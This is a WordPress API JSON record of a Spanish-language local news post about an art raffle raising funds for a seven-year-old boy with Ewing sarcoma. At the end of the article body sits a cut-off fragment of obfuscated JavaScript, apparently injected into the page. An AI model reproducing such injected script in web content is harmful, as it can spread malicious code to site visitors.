{"id":21097,"date":"2025-03-27T03:06:48","date_gmt":"2025-03-27T03:06:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21097"},"modified":"2025-03-27T03:06:48","modified_gmt":"2025-03-27T03:06:48","slug":"ayudemos-al-pequeno-mateo-esta-internado-por-una-enfermedad-rara","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21097","title":{"rendered":"Ayudemos al peque\u00f1o Mateo, est\u00e1 internado por una enfermedad rara"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0032-1024x1024.jpg\" alt=\"\" class=\"wp-image-21098\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0032-1024x1024.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0032-300x300.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0032-150x150.jpg 150w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0032-768x768.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250326-WA0032.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>26 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Hugo Huitzi artista pop don\u00f3 una de sus obras para realizar una rifa con causa a favor del peque\u00f1o Mateo con Sarcoma de Ewing.<\/p>\n\n\n\n<p>Actualmente mateo se encuentra internado en la Ciudad de M\u00e9xico.<\/p>\n\n\n\n<p>Se trata de un tipo raro de c\u00e1ncer de huesos y tejidos blandos que se presenta m\u00e1s en ni\u00f1os y adultos j\u00f3venes, no es nada com\u00fan ya que ocurre en dos ni\u00f1os por cada mill\u00f3n.<\/p>\n\n\n\n<p>El tratamiento para el peque\u00f1o de 7 a\u00f1os de edad requiere atenci\u00f3n especializada, m\u00faltiples sesiones m\u00e9dicas as\u00ed como medicamentos costosos.<\/p>\n\n\n\n<p>Es por ello que los padres del menor requieren del valioso apoyo de la poblaci\u00f3n ya que esta enfermedad desgasta f\u00edsica, emocional, mental y econ\u00f3micamente.<\/p>\n\n\n\n<p>Por esta raz\u00f3n la Asociaci\u00f3n sin Fines de Lucro Corazones Chiapas que busca apoyo para poblaci\u00f3n vulnerable y trabaja con diferentes sectores como los migrantes, incentiva el deporte los artistas entregan medicamento etc, se suma a esta causa.<\/p>\n\n\n\n<p>En esta sinergia lograron sumar el trabajo del artista tuxtleco, quien con todo el deseo de ayudar ha donado uno de sus trabajos para recaudar fondos.<br>Esta obra de Hugo, se basa en un dise\u00f1o pop como la mayor\u00eda de personajes que realiza en pintura, \u201cnos estamos sumando a esta causa del peque\u00f1o mateo, por el desaf\u00edo que enfrentan sus padres por esta padecimiento que enfrenta\u201d.<\/p>\n\n\n\n<p>El artistas coment\u00f3 que los boletos tienen un precio de 100 pesos y se espera vender 200 n\u00fameros para que la rifa sea llevada a cabo el d\u00edas 30 de abril.<\/p>\n\n\n\n<p>\u201cMateo nos necesita est\u00e1 en la ciudad de M\u00e9xico, necesita nuestra ayuda por eso hacemos este llamado para sumarnos, a que seamos emp\u00e1ticos\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Los boletos pueden adquirirse en la p\u00e1gina de \u201cCorazones Chiapas\u201d y \u201cUnidos por Mateo\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 26 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Hugo Huitzi artista pop don\u00f3 una de sus obras para realizar una rifa con causa a favor del peque\u00f1o Mateo con Sarcoma de Ewing. Actualmente mateo se encuentra internado en la Ciudad de M\u00e9xico. Se trata de un tipo raro de c\u00e1ncer de huesos y tejidos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21098,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21097","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21097","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21097"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21097\/revisions"}],"predecessor-version":[{"id":21099,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21097\/revisions\/21099"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21098"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21097"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21097"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21097"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}